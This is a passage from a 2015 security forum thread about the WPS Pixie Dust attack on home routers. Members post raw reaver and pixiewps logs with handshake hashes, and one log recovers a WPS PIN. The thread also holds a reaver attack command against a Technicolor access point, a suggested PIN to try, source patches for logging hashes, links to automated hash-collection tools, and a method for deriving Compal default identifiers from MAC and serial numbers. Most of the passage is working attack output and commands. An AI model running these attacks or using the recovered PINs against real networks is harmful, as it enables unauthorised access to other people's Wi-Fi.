    [P] PKR: 62:dd:72:61:8b:fe:85:22:81:e5:2f:33:0f:e7:07:c3:a1:97:62:d7:69:7a:7d:dd:c6:1d:af:cf:f4:b5:83:31:42:6a:21:69:ec:d5:0a:15:16:ee:76:bf:9f:a7:fb:01:dd:64:ee:c7:42:41:f9:25:dd:ee:2c:88:9a:1e:3e:fa:a1:bb:97:8d:4a:33:25:d4:ff:f1:83:93:fe:98:c8:6a:90:2a:b0:f3:76:aa:6a:31:d5:18:16:dd:75:93:b9:e3:b9:39:4e:c8:ce:01:82:58:14:30:d8:92:af:6d:b4:69:29:ec:4b:52:e7:83:5c:3d:ae:a8:73:38:55:ac:87:76:85:c3:e8:8e:bd:ff:d9:b0:c1:3b:06:37:89:6e:ec:2b:75:24:1f:89:56:6d:79:27:9f:c9:02:00:32:b7:71:cf:ec:08:af:bc:ff:46:1f:aa:7d:c6:d6:bf:8d:b0:d2:ac:a9:02:ba:88:45:69:fc:81:fb:59:eb:15:bb:4a:23:44
    [P] AuthKey: 9d:25:78:e1:27:48:12:fa:97:5f:aa:6f:3a:68:d2:86:3f:62:ec:c7:51:a1:df:02:87:f9:48:fd:56:fc:67:08
    [+] Sending M2 message
    [+] Received M1 message
    [P] E-Hash1: 3e:08:b5:6b:9b:bd:cd:2e:07:b6:0b:76:ba:99:97:1a:f4:d9:38:11:09:f4:af:8c:3c:cd:dd:19:94:d7:b4:a7
    [P] E-Hash2: c4:39:a8:b6:3b:67:80:32:0f:1c:62:f7:40:d8:4d:85:9f:02:e7:fc:5a:4a:85:a6:e8:8f:5b:0d:aa:55:b0:09
    [Pixie-Dust]  
    [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] PSK1: 7a:a9:99:5e:00:60:98:fd:91:37:2c:e9:f4:1c:67:11
    [Pixie-Dust][*] PSK2: ce:81:5a:1b:39:ce:c3:07:86:59:21:71:0c:f4:a6:31
    [Pixie-Dust]   [+] WPS pin: 19048185

  35. #285
    Join Date
    2015-Apr
    Posts
    15
    Sorry for off-topic, i've got further information about Compal:

    MAC-Address 5C:35:3B:xx:xx:xx
    cbn–zyy–xxx-xxx
    Serial-Number: NNNNNxxxxxxxxx
    In mine 8 cases, "N" is 53059.(Convert this Number (with leading zero)in HEX and you get 353B,Part of the MAC-Address.
    The other 9 Numbers "x" are the last 6 Letters from the MAC-Address in Decimal.
    And cbn should be something like „Compal Broadband Network“.

    Later last Day i've got two Compal-Models with MAC-Address (DC:53:7C), each of them have a different Pin :


    Code:
    [P] E-Nonce: 00:b1:56:19:7a:47:6b:c8:28:93:26:7b:73:87:41:43
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] PKR: f2:60:5d:f8:f9:f6:51:7b:50:12:9d:96:2d:67:45:96:40:57:9b:65:54:b0:37:45:c7:4d:e8:8b:0b:ee:4e:8a:c0:74:6c:15:e6:26:8b:a8:b2:e3:9b:61:29:c9:26:83:a7:35:2b:e2:84:e3:e3:6c:d5:40:a0:5e:49:37:66:95:4a:a8:9d:c2:e0:cd:7e:72:ac:52:48:1b:86:bb:47:9b:f9:d9:c8:b2:4b:12:0b:58:35:f1:2e:93:48:fa:38:2e:9c:5e:cd:a4:be:ba:f2:cf:e7:e0:e4:ba:bb:20:12:f1:c4:a0:8a:9c:02:ed:54:ac:26:a0:25:9a:b5:55:ad:92:ef:07:a8:09:c4:f1:38:36:c5:65:8c:98:70:cd:3e:ac:4f:76:79:90:64:f2:55:59:8e:8c:76:95:15:51:28:7d:f7:b8:b7:01:10:f4:48:a2:84:b1:20:f1:90:4a:4b:c8:af:23:58:de:5d:64:12:e8:ab:35:46:f2:4b:00:bb:3c
    [P] AuthKey: 57:0f:2c:2d:b9:96:9a:ca:96:07:fd:86:c3:f2:b2:cd:7d:27:9b:d3:b4:a5:5b:89:65:62:3a:8a:51:a8:74:57
    [P] E-Hash1: 2e:c6:22:b4:6e:cf:d7:cb:ec:bf:b1:bc:d1:91:76:75:a6:6a:84:52:3c:55:48:b1:cf:e2:27:da:e8:0c:c5:70
    [P] E-Hash2: e6:28:3f:35:de:2d:a3:bd:4a:88:bc:2b:27:fa:24:22:58:0b:b9:ca:83:ba:75:dc:dd:6c:aa:81:5e:ce:61:e4
    AND HERE:

    Code:
    [P] E-Nonce: 10:7b:c3:b1:65:cd:d7:fb:75:48:55:18:1c:3e:00:fc
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] PKR: cf:bc:97:7a:fe:b1:27:2c:4e:95:da:d1:92:87:01:70:8d:e3:f1:cc:f8:6c:1d:e6:26:23:c9:62:67:e0:37:71:8b:77:8b:c1:f4:ce:12:7b:f9:fb:0f:27:6f:78:99:77:27:2b:70:ce:b5:c9:41:d3:dd:07:d8:78:fc:d7:7d:45:2d:b9:f5:e2:33:40:67:20:66:68:12:0f:66:b3:bd:8b:e9:4e:57:f5:ca:ea:91:11:7a:fb:2c:bd:05:f5:59:ec:4e:5e:10:a5:04:20:59:bd:04:c5:6c:d1:28:7c:03:e5:c2:5c:ec:15:b9:98:e0:65:e8:07:2e:3f:f0:b7:05:29:a9:ad:a5:c6:f8:1c:a5:30:f0:1b:ea:d2:bb:23:c7:1b:e3:b4:0e:dd:65:a9:d2:98:4d:e8:28:bd:fa:ba:fe:dc:66:b5:ed:28:86:e1:59:97:f9:d9:4a:93:1f:fe:cb:86:30:c4:12:54:a1:cf:16:dc:e8:5d:9e:15:aa:a5:6c:bf
    [P] AuthKey: 3c:1c:17:cb:bf:d0:e9:c0:95:c2:ef:64:04:64:c6:94:0a:c3:45:7d:f3:66:89:1e:69:9e:4f:a2:d0:6c:a3:6b
    [P] E-Hash1: 24:ba:d7:f0:b9:7e:24:ae:f8:57:28:13:26:61:56:3d:67:6e:02:2f:8d:50:df:74:89:53:50:91:70:e9:b1:64
    [P] E-Hash2: a6:ad:3b:e8:e0:ed:1c:06:9c:cc:4b:0b:f1:79:b6:af:f5:69:ef:97:ca:78:1e:01:68:1d:22:54:6f:57:d4:f1
    /\/\

    NOT VULNERABLE:

    Linksys WRT120n
    Atheros AR9285

    Code:
    [P] E-Nonce: 6f:e3:4f:8b:e4:83:08:41:8d:5e:b8:98:cc:71:f2:8f
    [P] PKE: f3:d3:80:1b:b8:f7:00:01:74:bb:3f:8d:dc:bc:17:ee:5f:e1:0e:c5:c3:ad:23:43:29:ad:b6:bc:7b:97:84:86:a2:ed:20:f9:5a:a6:72:64:1d:51:b9:da:7b:5d:e8:34:9b:a3:36:05:f1:6c:c4:8c:54:37:74:ed:d3:36:9e:e4:cc:08:e4:92:c6:ed:0f:e1:f1:c4:b8:36:bb:9d:03:97:01:89:ff:62:ce:2e:3f:38:1e:8d:fb:f1:85:9d:af:b5:16:99:ad:51:d5:03:d8:c3:77:f2:00:8c:7e:02:09:77:ef:31:58:33:13:da:3e:35:b4:67:77:ff:04:60:5f:fe:e5:0b:ff:a2:e3:fd:06:86:c1:b7:f8:bd:1b:a5:d9:45:c7:e4:d2:8e:20:99:66:4b:b3:62:0d:66:cc:ed:11:6b:d8:5c:fb:7b:1f:46:c9:7c:ae:e1:00:f1:e9:70:6b:69:22:bf:19:d8:e7:42:67:30:61:cb:f6:ad:9e:4e:44:84
    [P] PKR: c5:b0:0a:28:4d:ba:ad:2f:05:ce:53:76:fa:fc:98:32:4a:ff:75:59:22:6e:06:aa:1f:15:be:48:bc:44:55:66:98:ea:a0:9d:d3:81:bd:df:53:55:6a:55:f0:68:63:1c:6a:b5:53:5a:3a:a6:5a:12:54:1f:82:4a:f0:7e:1a:9c:15:96:dd:0c:7b:e1:fa:ea:c1:e8:cc:5f:e0:0b:24:47:ee:1e:a8:84:d1:06:80:ea:e3:24:ac:40:66:29:7c:ae:79:66:42:00:c8:82:4a:b1:c9:a4:3a:04:34:b6:42:dc:4a:81:79:c1:40:c6:95:80:ff:75:60:2a:1a:62:da:a6:b2:c4:68:19:56:77:1f:0a:70:22:fe:3a:76:ac:ba:1d:9d:5b:2d:12:6b:a5:d5:18:7a:bb:5a:d4:3f:f2:59:6f:ca:f6:2b:5b:3b:f8:f1:92:e2:a7:57:4e:f5:f0:7a:a3:31:6d:6b:52:2a:85:84:71:51:c0:b2:11:7d:db:fc:15
    [P] AuthKey: 81:fd:7e:7a:3a:53:76:0b:65:f9:1e:e9:fb:a1:1a:89:c4:98:b3:57:cb:1f:60:69:52:4e:6d:dc:2b:1f:6b:b2
    [P] E-Hash1: a6:e9:dc:2d:19:d6:fe:e8:39:32:d9:83:69:b5:25:49:79:b8:70:27:4d:9b:b4:a1:93:e4:17:0c:36:9e:a0:fe
    [P] E-Hash2: b7:73:33:9d:69:d8:d0:e0:fe:5c:1c:b1:a6:8c:41:a4:61:5e:57:3b:d0:92:86:96:e2:db:f5:e7:bf:56:fa:c5
    NOT VULNERABLE:

    D-Link 615 B2
    Atheros AR5416/Atheros AR2122


    Code:
    [P] E-Nonce: 6e:e4:ae:67:c5:46:86:65:6d:ab:0a:c9:90:2a:89:cb
    [P] PKE: e2:4b:6c:da:3b:c9:9c:0a:1f:97:52:69:d4:55:2a:5e:85:fb:35:bd:f8:d1:47:a3:d3:53:5e:28:b8:ca:74:8f:0c:c2:8d:4c:18:f8:52:16:54:ee:da:bf:1d:c3:c4:15:a4:0d:24:96:a9:95:b2:28:d7:ec:a2:87:f8:b4:70:24:fc:aa:c7:33:bb:fd:b2:e8:ef:7a:df:07:70:d6:df:2c:8b:dd:d1:3b:f7:fa:1d:cc:53:35:a4:99:d8:77:41:dd:2e:7e:c4:2a:37:4d:6d:59:90:f5:ed:30:d7:93:82:cf:22:2b:9d:95:08:3d:cc:bf:cd:78:99:66:ac:a8:81:7f:32:33:63:ae:b6:16:f1:d4:e1:10:3f:08:64:f8:86:72:da:c6:97:53:f0:c7:07:c4:0e:2c:c7:48:30:cc:0b:f0:ba:27:8d:5c:39:4d:68:cd:3c:b3:19:13:03:7a:be:4d:b1:19:bd:f0:83:f8:40:88:82:c9:ee:94:7a:43:8d:2f
    [P] PKR: 15:e1:31:80:df:2b:44:9a:9a:21:58:00:42:75:e9:22:23:ea:96:66:04:e0:0c:12:96:20:a4:51:55:59:2f:ac:ad:bf:e5:c6:60:30:3e:fd:fa:62:b0:cd:f9:26:e7:2a:c7:69:80:97:ce:f0:ec:6d:03:bb:c5:d2:44:f1:d4:bd:88:be:8f:e2:e7:69:42:10:21:9d:8d:da:d6:d9:58:c7:48:8c:80:4c:25:76:c4:d8:5b:6d:25:8d:d1:1e:08:ab:10:2b:c0:73:af:7e:a6:c0:0f:8c:4c:61:54:8f:11:fc:18:51:e5:af:62:c8:19:12:2e:6e:84:0f:35:ad:9b:d6:21:f7:31:f1:00:6e:55:df:5b:ac:67:cd:1a:36:7c:14:de:f6:e1:01:14:d1:e5:88:78:6c:9a:7a:0e:24:bb:b1:82:97:c9:06:1b:66:7f:50:41:d6:e6:80:e3:28:a7:b9:47:1b:1e:cf:0b:92:da:f8:50:92:94:de:fa:2e:6c:82
    [P] AuthKey: 68:4a:a0:f1:48:81:32:6a:ec:22:e7:2d:4a:ff:4c:97:42:6c:f4:5c:1c:78:2f:05:73:bd:d4:e3:eb:9b:3a:e4
    [P] E-Hash1: 2e:dc:77:bf:39:09:1a:44:a4:1d:45:28:12:64:c1:7d:ca:9e:f4:40:89:44:05:14:10:32:dc:b5:f7:73:24:c3
    [P] E-Hash2: 26:4f:77:c9:c9:3e:34:a3:80:c4:07:b8:83:2a:66:a2:51:04:cd:e6:0f:6a:97:7a:4f:21:37:81:51:04:1e:1f

  36. #286
    Join Date
    2015-Mar
    Posts
    127
    1. Which is the best tool for automated hash collection. Something we could use to gather hashes to send off for analysis, possibly find new holes for pixiewps.

    2. Are hashes from locked routers, corrupt - no good 4 analysis?

    3. Also any update on Realtek attack?

  37. #287
    Join Date
    2013-Sep
    Posts
    264
    1.
    The best way is simply to save a *.cap file with the PROBES and M messages and to add a *.txt file with the output of modified reaver.
    In the case that the chipset and/or the model-manufacturer doesn't appear fully/dirreclty in the probes/stdout of modified reaver, please add manualy this information

    2.
    They are not corrupted but you need to get m1-m2 and m3 and you will not get this full sequence on a locked router (until it is unlocked again).

    3.
    Do you know how to "disassemble" firmware? i am stuck and need some help, i found something very interesting on unsupported realteck in parts that can be disassembled easly with binwalk from craig heffner.
    basically there is a little *.sh script on startup that generate 4 things ( or check if theses four things have been generated correctly and generate them if that not the case) and one of them is the default WPS PIN.
    on this devices the PIN is permanent/unconfigurable
    Help would be appreciated

  38. #288
    Join Date
    2015-Mar
    Posts
    127
    The best way is simply to save a *.cap file with the PROBES and M messages
    Gonna take a look at wireshark, try and figure it out.
    kcdtv, appreciate the responses -very interesting.

    Hope someone is developing a tool to automate the process, for noobs. If made easy for noobs like me, we can help build the data collection pool.

  39. #289
    Join Date
    2015-Apr
    Posts
    15
    i use a modified reaver-src. if i set the -o $logfile switch, reaver writes only the pixie-data in the logfile:

    For AuthKey make the following changes:

    change :
    Code:
    wps_common.c:    printf("[P] AuthKey: ");
    to :
    Code:
    wps_common.c:    cprintf(VERBOSE, "[P] AuthKey: ");
    and add a new line in wps_common.c (under #include "wps_dev_attr.h) with:
    Code:
    #include "../misc.h"
    And for Messages, you don't need (Here the M1 received Msg):
    replace:
    Code:
    exchange.c:                cprintf(VERBOSE, "[+] Received M1 message\n");
    with:
    Code:
    exchange.c:                printf("[+] Received M1 message\n");
    i'll search with grep for all reaver messages, and change everything, which is not important for the output-file.
    Not the perfect way, but it works
    Last edited by someone_else; 2015-04-26 at 15:21.

  40. #290
    Join Date
    2015-Feb
    Posts
    6
    I do have a fork of autopixiewps i modified a while back that does hash collections, and then produces also a shell script. Ill update my fork in my github repo ( github user name: d8tahead ).

    It saves generic reaver output of model info, collects hashes, and produces shell script for coresponding hashes with pixiewps And gives each segment an ID#.

    edit:
    The one in my repo is a little old, ill update it soon

    will post asap

    Edit #2:

    i had strip out some things from the code, but it should still work fine

    autopixie has been updated in my repo:
    https://github.com/d8tahead/AutoPixieWps

    and you will need the new reaver t6x fork ( i added addition of R-Nonce for future pixiewps ) :
    https://github.com/t6x/reaver-wps-fork-t6x

    for my fork of autopixiewps for the hash gathering, you will need to enable option #5 on the main menu before the wash scan ( pixiehash gathering mode ).

    also please note that the logs will be saved as essid and bssid and the prefix of PixieHash in the executing directory!
    so be sure to cd to whichever directory you would like the hashes to be saved if executing from a shell.

    remember to make autopixiewps.py executable!
    Last edited by datahead; 2015-04-27 at 05:41.

  41. #291
    Join Date
    2015-Apr
    Posts
    5
    after last ur update reavet doesnt work pixiewps: invalid option -- 'm'

  42. #292
    Join Date
    2015-Apr
    Posts
    28
    İSSUE : ??

    I look all pixie test post in this title ... Some modems are invulnerable because manufacturer, wps model numbers are FALSE.!

    Example :

    Wps Manufacturer : TPLINK
    WPs model nambur :1

    Tplink uses Realtek and Atheros chipset...

    True value :

    Wps manufacturer : Atheros
    wps model number : WR740..

    Other example:

    WpsManufakturer : Realtek semicondukter,
    Wps Model number : EV-2006-07-27...

    Not "EV-2006-07-27" model number , true value :RTL8671

  43. #293
    Join Date
    2015-Apr
    Posts
    9
    Can someone please tell me how to make reaver delay between sending M1 and M2?

  44. #294
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Saydamination View Post
    İSSUE : ??

    I look all pixie test post in this title ... Some modems are invulnerable because manufacturer, wps model numbers are FALSE.!

    Example :

    Wps Manufacturer : TPLINK
    WPs model nambur :1

    Tplink uses Realtek and Atheros chipset...

    True value :

    Wps manufacturer : Atheros
    wps model number : WR740..

    Other example:

    WpsManufakturer : Realtek semicondukter,
    Wps Model number : EV-2006-07-27...

    Not "EV-2006-07-27" model number , true value :RTL8671
    It is not a problem with reaver, it is just how the AP is configured. You will see the same thing in Wireshark if you look.

  45. #295
    Join Date
    2015-Apr
    Posts
    5

    Exclamation

    Dependencies
    [code]
    sudo apt-get install libssl-dev
    sudo apt-get install libpcap-dev
    sudo apt-get install libsqlite3-dev

    Couldnt get the libssl-dev its forbidden in repository as kali is unable to update
    im running latest live ver. but still can get the package.
    pixie is unable to install without ssl.
    help me......

  46. #296
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by unsuns06 View Post
    I confirm it's working on Technicolor TD5130 v2... :

    ..But not on TD5130 v1 :

    Code:
    wifislax ~ # reaver -i mon0 -b 00:18:E7:XX:XX:XX -c 1 -K 3 -P
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
    
    [+] Waiting for beacon from 00:18:E7:XX:XX:XX
    [+] Associated with 00:18:E7:XX:XX:XX (ESSID: TNCAPxxxxxx)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [P] E-Nonce: 55:b3:65:81:7c:d3:2a:9b:72:bf:d2:23:58:93:d9:88
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Technicolor
    [P] WPS Model Number: Technicolor TD5
    [P] Access Point Serial Number: 1209A1D12783
    [P] PKR: 2f:97:c1:c5:de:cd:d7:b5:15:ef:8d:bb:e1:53:7c:9f:5c:3d:d2:48:63:a2:d2:ec:1b:88:69:27:44:d2:be:4f:b6:a6:b8:07:5b:10:8c:a1:a7:01:ea:b7:f0:71:a9:90:31:78:f4:16:8f:4b:6b:0a:89:48:70:18:ad:93:f7:a7:4f:46:37:ee:50:cb:64:5f:c6:ec:a4:10:5f:ef:a5:90:0c:3b:e3:b3:50:e9:2a:6b:ea:ce:b4:c4:7f:51:be:ae:59:45:a8:17:a3:8e:9f:6a:05:9e:6f:8b:76:c4:30:9f:bc:c1:b6:76:2b:6d:dd:4e:3b:26:6c:c9:f5:eb:c6:49:eb:9d:a3:ae:64:5a:f5:87:88:46:ff:30:3e:87:1a:e0:12:89:81:7f:6e:f3:a2:8b:f5:66:47:66:ab:71:0b:1f:4d:de:9f:d9:d7:c4:cc:c5:73:65:93:75:dd:89:ec:43:b0:2e:7e:51:46:1f:79:ee:70:4b:de:26:8a:21:6c:99
    [P] AuthKey: f1:63:8a:98:70:5b:6b:9b:fc:e5:f7:69:c9:a8:fd:01:9c:b8:81:e9:c7:07:44:60:98:f1:c1:70:62:d0:65:f4
    [P] E-Nonce: 5f:a2:06:2d:1c:01:6b:cc:67:7e:f6:e7:53:df:38:01
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Technicolor
    [P] WPS Model Number: Technicolor TD5
    [P] Access Point Serial Number: 1209A1D12783
    [P] PKR: 1e:4c:22:6d:a7:ce:f8:b7:d0:16:83:76:33:6b:8f:4f:b1:9e:6c:8a:a6:7d:6a:4a:14:8e:4e:5b:2e:fa:e5:4e:a1:b2:d0:a0:65:75:16:a6:10:60:27:8d:31:74:4b:e1:4e:0e:18:2d:f2:ae:10:3f:2f:14:ff:51:75:24:8b:d3:6a:a4:23:72:7d:d8:bb:63:6b:89:c9:22:0f:32:e3:1b:bb:2b:b6:3c:8a:b3:4f:c7:a1:4b:fc:d2:4c:73:9c:1d:3f:ae:6d:aa:3f:f0:a0:84:51:e2:1f:ca:91:f5:89:44:47:48:3c:23:6e:e0:b5:22:f3:c7:9c:db:3f:91:82:78:9f:73:4a:dd:38:00:f4:ee:a9:4f:ce:4a:4c:e8:3f:87:9f:e6:3a:a9:07:90:31:05:09:a7:7d:3f:e6:03:70:44:61:f8:20:cc:47:c3:15:dd:50:52:54:ee:99:c4:85:7e:8a:64:8f:0f:60:16:3a:ed:3c:8d:d9:17:3e:ca:22:62
    [P] AuthKey: f7:94:e0:53:05:c6:92:37:13:8c:d8:04:54:3a:42:5e:5f:8f:4f:28:ae:7a:51:9e:91:3e:69:e8:f6:c8:68:43
    [P] E-Hash1: 51:6d:e5:bc:37:d0:ae:bb:de:b8:6d:91:40:b4:55:1a:c0:15:a1:32:29:1a:c3:66:9f:3e:6f:38:39:3c:ee:95
    [P] E-Hash2: c5:e2:df:28:ed:50:8d:69:31:e9:85:9e:1b:68:12:18:cf:c7:1f:f7:f8:41:f4:01:b3:5a:8e:83:a3:24:9e:96
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 1 s
    So we're waiting for a new update of Pixie, and I hope it'll be very soon...
    Try this PIN: 76757891

  47. #297
    Join Date
    2015-Mar
    Posts
    127
    What fixes, improvements will pixiewps 1.1 bring?

  48. #298
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by nuroo View Post
    What fixes, improvements will pixiewps 1.1 bring?
    Full Realtek PRNG brute force, Authkey computation if you don't want to use the modified Reaver, and its a bit more user friendly

  49. #299
    Join Date
    2015-Apr
    Posts
    29
    Quote Originally Posted by aboulatif View Post
    after last ur update reavet doesnt work pixiewps: invalid option -- 'm'
    i have same problem.
    whats wrong?

  50. #300
    Join Date
    2015-Apr
    Posts
    4
    How did you get this PIN ?

    I will try it later this week because I'm travelling right now.

    Thank you.

Similar Threads

  1. WPS Pixie Dust Attack (Offline WPS Attack)
    By soxrok2212 in forum General Archive
    Replies: 353
    Last Post: 2015-05-05, 08:32
  2. Pixiewps: wps pixie dust attack tool
    By wiire in forum General Archive
    Replies: 89
    Last Post: 2015-05-04, 19:32
  3. Implement new WPS Pixie Dust Attack into Reaver
    By six in forum General Archive
    Replies: 24
    Last Post: 2015-01-28, 20:31

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •